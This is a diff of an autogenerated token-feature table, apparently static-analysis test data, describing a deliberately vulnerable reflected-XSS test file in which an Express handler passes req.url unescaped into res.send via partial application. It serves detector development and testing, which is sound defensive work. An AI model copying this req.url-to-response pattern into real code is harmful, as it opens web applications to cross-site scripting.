y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:26 | R.partial | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:26 | R.partial | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:26 | R.partial | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:26 | R.partial | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:51 | R.parti ... q.url]) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:51 | R.parti ... q.url]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:51 | R.parti ... q.url]) | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:51 | R.parti ... q.url]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:51 | R.parti ... q.url]) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:51 | exceptional return of R.parti ... q.url]) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:51 | exceptional return of R.parti ... q.url]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:51 | exceptional return of R.parti ... q.url]) | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:51 | exceptional return of R.parti ... q.url]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:51 | exceptional return of R.parti ... q.url]) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:40:20:40:26 | partial | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:40:20:40:26 | partial | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:40:20:40:26 | partial | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:40:20:40:26 | partial | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:40:20:40:26 | partial | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:40:28:40:39 | sendResponse | CalleeFlexibleAccessPath | R.partial | | autogenerated/Xss/ReflectedXss/partial.js:40:28:40:39 | sendResponse | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:40:28:40:39 | sendResponse | calleeImports | ramda | @@ -21745,11 +144784,81 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:40:42:40:50 | [req.url] | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:40:42:40:50 | [req.url] | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:40:42:40:50 | [req.url] | receiverName | R | +| autogenerated/Xss/ReflectedXss/partial.js:40:43:40:45 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:40:43:40:45 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:40:43:40:45 | req | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:40:43:40:45 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:40:43:40:45 | req | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:40:43:40:49 | req.url | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:40:43:40:49 | req.url | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:40:43:40:49 | req.url | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/partial.js:40:43:40:49 | req.url | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/partial.js:40:43:40:49 | req.url | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:40:43:40:49 | req.url | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:40:43:40:49 | req.url | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:40:43:40:49 | req.url | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:40:43:40:49 | req.url | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:40:43:40:49 | req.url | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:40:47:40:49 | url | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:40:47:40:49 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:40:47:40:49 | url | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:40:47:40:49 | url | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:40:47:40:49 | url | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:11 | [1, 2, 3] | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:11 | [1, 2, 3] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:11 | [1, 2, 3] | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:11 | [1, 2, 3] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:11 | [1, 2, 3] | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:19 | [1, 2, 3].forEach | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:19 | [1, 2, 3].forEach | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:19 | [1, 2, 3].forEach | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:19 | [1, 2, 3].forEach | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:19 | [1, 2, 3].forEach | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:29 | [1, 2, ... llback) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:29 | [1, 2, ... llback) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:29 | [1, 2, ... llback) | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:29 | [1, 2, ... llback) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:29 | [1, 2, ... llback) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:29 | exceptional return of [1, 2, ... llback) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:29 | exceptional return of [1, 2, ... llback) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:29 | exceptional return of [1, 2, ... llback) | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:29 | exceptional return of [1, 2, ... llback) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:41:3:41:29 | exceptional return of [1, 2, ... llback) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:41:4:41:4 | 1 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:41:4:41:4 | 1 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:41:4:41:4 | 1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:41:4:41:4 | 1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:41:4:41:4 | 1 | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:41:4:41:4 | 1 | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:41:4:41:4 | 1 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:41:4:41:4 | 1 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:41:4:41:4 | 1 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:41:4:41:4 | 1 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:41:7:41:7 | 2 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:41:7:41:7 | 2 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:41:7:41:7 | 2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:41:7:41:7 | 2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:41:7:41:7 | 2 | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:41:7:41:7 | 2 | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:41:7:41:7 | 2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:41:7:41:7 | 2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:41:7:41:7 | 2 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:41:7:41:7 | 2 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:41:10:41:10 | 3 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:41:10:41:10 | 3 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:41:10:41:10 | 3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:41:10:41:10 | 3 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:41:10:41:10 | 3 | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:41:10:41:10 | 3 | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:41:10:41:10 | 3 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:41:10:41:10 | 3 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:41:10:41:10 | 3 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:41:10:41:10 | 3 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:41:13:41:19 | forEach | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:41:13:41:19 | forEach | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:41:13:41:19 | forEach | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:41:13:41:19 | forEach | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:41:13:41:19 | forEach | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:41:21:41:28 | callback | CalleeFlexibleAccessPath | ?.forEach | | autogenerated/Xss/ReflectedXss/partial.js:41:21:41:28 | callback | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:41:21:41:28 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21757,6 +144866,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:41:21:41:28 | callback | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | | autogenerated/Xss/ReflectedXss/partial.js:41:21:41:28 | callback | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:41:21:41:28 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:44:1:44:3 | app | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:44:1:44:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:44:1:44:3 | app | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:44:1:44:7 | app.get | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:44:1:44:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:44:1:44:7 | app.get | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:44:1:55:2 | app.get ... site\\n}) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:44:1:55:2 | app.get ... site\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:44:1:55:2 | app.get ... site\\n}) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:44:1:55:2 | exceptional return of app.get ... site\\n}) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:44:1:55:2 | exceptional return of app.get ... site\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:44:1:55:2 | exceptional return of app.get ... site\\n}) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:44:5:44:7 | get | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:44:5:44:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:44:5:44:7 | get | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:44:9:44:17 | "/return" | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/partial.js:44:9:44:17 | "/return" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:44:9:44:17 | "/return" | calleeImports | express | @@ -21764,6 +144888,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:44:9:44:17 | "/return" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/partial.js:44:9:44:17 | "/return" | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:44:9:44:17 | "/return" | receiverName | app | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | 'arguments' object of anonymous function | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | (req, r ... site\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | (req, r ... site\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | (req, r ... site\\n} | calleeImports | express | @@ -21771,6 +144900,131 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | (req, r ... site\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | (req, r ... site\\n} | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | (req, r ... site\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | exceptional return of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | exceptional return of anonymous function | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | exceptional return of anonymous function | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | return of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | return of anonymous function | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:44:20:55:1 | return of anonymous function | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:44:21:44:23 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:44:21:44:23 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:44:21:44:23 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:44:21:44:23 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:44:21:44:23 | req | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:44:21:44:23 | req | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:44:21:44:23 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:44:21:44:23 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:44:21:44:23 | req | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:44:21:44:23 | req | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:44:26:44:28 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:44:26:44:28 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:44:26:44:28 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:44:26:44:28 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:44:26:44:28 | res | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:44:26:44:28 | res | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:44:26:44:28 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:44:26:44:28 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:44:26:44:28 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:44:26:44:28 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:45:2 | this | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:45:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:45:2 | this | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:45:2 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:45:2 | this | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | 'arguments' object of function getFirst | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | 'arguments' object of function getFirst | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | 'arguments' object of function getFirst | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | 'arguments' object of function getFirst | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | 'arguments' object of function getFirst | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | exceptional return of function getFirst | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | exceptional return of function getFirst | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | exceptional return of function getFirst | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | exceptional return of function getFirst | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | exceptional return of function getFirst | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | functio ... x;\\n } | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | functio ... x;\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | functio ... x;\\n } | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | functio ... x;\\n } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | functio ... x;\\n } | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | return of function getFirst | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | return of function getFirst | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | return of function getFirst | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | return of function getFirst | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:45:3:47:3 | return of function getFirst | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:45:12:45:19 | getFirst | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:45:12:45:19 | getFirst | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:45:12:45:19 | getFirst | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:45:12:45:19 | getFirst | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:45:12:45:19 | getFirst | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:45:12:45:19 | getFirst | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:45:12:45:19 | getFirst | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:45:12:45:19 | getFirst | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:45:12:45:19 | getFirst | fileImports | express lodash ramda underscore | +| 